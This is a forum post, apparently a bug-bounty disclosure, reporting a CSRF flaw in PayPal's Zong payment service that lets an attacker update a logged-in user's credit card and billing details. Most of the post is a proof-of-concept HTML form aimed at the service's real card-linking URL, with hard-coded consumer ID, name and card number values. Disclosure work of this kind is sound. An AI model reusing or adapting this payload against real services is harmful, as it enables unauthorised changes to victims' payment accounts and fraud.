• Paypal Zong Service Credit card & Billing Info Update CSRF

    Vendor product Brief Information : Zong aim Frictionless Mobile Payments to the world. Zong processing millions of payments a month in over 40 countries worldwide.

    CSRF Vulnerable URL : https://my.zong.com/ZPlusConsumerCon...creditCardLink

    CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated(OWASP).

    POC:

    Code:
    <form action="https://my.zong.com/ZPlusConsumerConsole/linkCC/creditCardLink" method="post" name="manageCreditCardForm" id="manageCreditCardForm">
      <input type="hidden" name="consumer_id" value="10053353027" id="consumer_id">
      <input type="hidden" name="is_update" value="false" id="is_update">
    
            <label for="billing_first_name">First name </label>
    
            <input type="text" class="text required" id="billing_first_name" name="billing_first_name" value="sandeep">
            <label for="billing_last_name">Last name</label>
            <input type="text" class="text required" id="billing_last_name" name="billing_last_name" value="kamble">
            <label for="billing_card_type">Card type</label>
            <select name="billing_card_type" class="select1" id="billing_card_type">
                <option value="Visa">Visa</option>
                <option value="MasterCard">MasterCard</option>
                <option value="AmericanExpress">American Express</option>
                <option value="Discover">Discover</option>
            </select>
          
            <label for="billing_card_number">Card number</label>
          
            <input type="text" class="text required" id="billing_card_number" name="billing_card_number" value="442411000016">
          
            <label for="billing_exp_month">Expiration date</label>
            <select name="billing_exp_month" class="select2" id="billing_exp_month">
                <option value="-1">Month</option>
                <option value="1">1</option>
                <option value="2">2</option>
                <option value="3">3</option>
                <option value="4">4</option>
                <option value="5">5</option>
                <option value="6">6</option>
                <option value="7">7</option>
                <option value="8">8</option>
                <option value="9">9</option>
                <option value="10">10</option>
                <option value="11">11</option>
                <option value="12">12</option>
            </select>
            <select name="billing_exp_year" class="select2" id="billing_exp_year">
                <option value="-1">Year</option>
                <option value="2013">2013</option>
                <option value="2014">2014</option>
                <option value="2015">2015</option>
                <option value="2016">2016</option>
                <option value="2017">2017</option>
                <option value="2018">2018</option>
                <option value="2019">2019</option>
                <option value="2020">2020</option>
                <option value="2021">2021</option>
                <option value="2022">2022</option>
                <option value="2023">2023</option>
            </select>
          
            <label for="billing_***">Security code</label>
            <input type="text" class="*** required" id="billing_***" maxlength="4" name="billing_***" value="">
             <button type="submit" id="_eventId_continue" name="_eventId_continue" value="continue" class="enterBtn"><span>Link Card</span></button>        
    </form>
    Thanks PP for such good bounty Program & PP security Team .
    Special thanks to My G4H Team.


    --[S]
    This article was originally published in forum thread: Paypal service Zong Update Credit Card & Billing Information CSRF started by [s] View original post
  • G4H Facebook

  • G4H Twitter